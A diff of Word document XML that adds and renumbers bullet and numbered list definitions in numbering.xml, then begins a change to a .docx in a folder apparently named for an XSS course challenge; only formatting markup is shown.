+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="45FD4EBD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="DC22A330"/>
@@ -10559,7 +10873,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4B4152A6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D82A6040"/>
@@ -10672,7 +10986,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="50B02ED0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="4A88D416"/>
+    <w:lvl w:ilvl="0" w:tplc="0C0A000D">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="535D5A2D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="79B0D0D0"/>
@@ -10785,7 +11212,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5B144F9A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="029C9B80"/>
@@ -10902,7 +11329,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="61165DD8"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="7BA04332"/>
+    <w:lvl w:ilvl="0" w:tplc="0C0A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="61AF34D9"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="065444D6"/>
@@ -11018,7 +11531,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="668E16AA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="53402F90"/>
@@ -11135,7 +11648,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="67B26C32"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FA16C164"/>
@@ -11284,7 +11797,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6F5F6D1A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A1E8CEC4"/>
@@ -11370,7 +11883,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="702C24BD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BADC0780"/>
@@ -11483,7 +11996,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="71580B4D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="928EFD78"/>
@@ -11632,7 +12145,233 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="35" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="759B02A0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="BF40AE7A"/>
+    <w:lvl w:ilvl="0" w:tplc="0C0A000D">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="77B65992"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6E30A7AE"/>
+    <w:lvl w:ilvl="0" w:tplc="A77CAF58">
+      <w:start w:val="2"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C0A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C0A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="77F427C6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="22B6E13A"/>
@@ -11745,7 +12484,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7CB90B84"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D9F8A432"/>
@@ -11858,7 +12597,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="39" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D880E05"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0ED0C388"/>
@@ -11971,7 +12710,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="35" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7E2814C8"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9B581D16"/>
@@ -12058,19 +12797,19 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1880120117">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="327056051">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1794707369">
-    <w:abstractNumId w:val="29"/>
+    <w:abstractNumId w:val="32"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="449322832">
-    <w:abstractNumId w:val="35"/>
+    <w:abstractNumId w:val="40"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="639191184">
-    <w:abstractNumId w:val="34"/>
+    <w:abstractNumId w:val="39"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1991904441">
     <w:abstractNumId w:val="21"/>
@@ -12079,10 +12818,10 @@
     <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1918436674">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="428818235">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="30"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="851456480">
     <w:abstractNumId w:val="18"/>
@@ -12091,16 +12830,16 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="39745796">
-    <w:abstractNumId w:val="30"/>
+    <w:abstractNumId w:val="33"/>
   </w:num>
   <w:num w:numId="13" w16cid:durableId="203375773">
     <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="961349203">
-    <w:abstractNumId w:val="31"/>
+    <w:abstractNumId w:val="34"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="1715230949">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="16" w16cid:durableId="128741794">
     <w:abstractNumId w:val="17"/>
@@ -12112,7 +12851,7 @@
     <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="19" w16cid:durableId="2120685136">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1119764290">
     <w:abstractNumId w:val="10"/>
@@ -12127,25 +12866,25 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="24" w16cid:durableId="1349211571">
-    <w:abstractNumId w:val="33"/>
+    <w:abstractNumId w:val="38"/>
   </w:num>
   <w:num w:numId="25" w16cid:durableId="1766684797">
     <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="26" w16cid:durableId="340204982">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="27" w16cid:durableId="2105491564">
     <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="28" w16cid:durableId="1732074816">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="29" w16cid:durableId="595290592">
     <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="30" w16cid:durableId="144048564">
-    <w:abstractNumId w:val="32"/>
+    <w:abstractNumId w:val="37"/>
   </w:num>
   <w:num w:numId="31" w16cid:durableId="1820270337">
     <w:abstractNumId w:val="8"/>
@@ -12164,6 +12903,21 @@
   </w:num>
   <w:num w:numId="36" w16cid:durableId="1104544354">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="37" w16cid:durableId="430666177">
+    <w:abstractNumId w:val="36"/>
+  </w:num>
+  <w:num w:numId="38" w16cid:durableId="877400130">
+    <w:abstractNumId w:val="28"/>
+  </w:num>
+  <w:num w:numId="39" w16cid:durableId="2020504595">
+    <w:abstractNumId w:val="22"/>
+  </w:num>
+  <w:num w:numId="40" w16cid:durableId="1482194283">
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="41" w16cid:durableId="1029137774">
+    <w:abstractNumId w:val="35"/>
   </w:num>
 </w:numbering>
 </file>

--- a/SRPING_8_CLIENTE_SIDE _XSS_CROSS_SITE_SCRIPTING/CHALLENGES/chalenge_1_Unit_1_Spring_8.docx
+++ b/SRPING_8_CLIENTE_SIDE _XSS_CROSS_SITE_SCRIPTING/CHALLENGES/chalenge_1_Unit_1_Spring_8.docx
@@ -871,10 +871,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FCC0CF7" wp14:editId="37EFAD18">
-            <wp:extent cx="5400040" cy="1205230"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1589748064" name="Imagen 1"/>
